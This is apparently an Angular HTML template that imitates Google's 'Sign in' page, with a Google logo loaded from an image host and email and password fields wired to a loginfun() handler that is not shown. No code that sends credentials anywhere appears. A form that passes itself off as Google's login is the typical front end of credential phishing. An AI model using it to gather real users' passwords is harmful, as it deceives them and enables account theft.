
  <div class="container">
    <div class="top-content">
      <img src="https://i.postimg.cc/CL7CmGSx/google-logo-png-29530.png" alt="">
      <h2>Sign in</h2>
      <p class="heading">Use your Google Account</p>
  
    </div>
    <form class="example-form" [formGroup]="login">
    <div class="inputs">
      <label for="email" class="input-label">Email or phone</label>
      <input type="email" matInput  id="email" formControlName="email" class="input" >
    
    </div>
    <div class="inputs">
      <label for="email" class="input-label">Password</label>
      <input type="password" matInput  id="email"  formControlName="password" class="input" >
      <!-- <label for="email" class="input-label">Password</label> -->
  
    </div>
    <div class="btn-group">
      <button class="next-btn"  (click)="loginfun()">Login</button>
    </div>
  </form>
  </div>
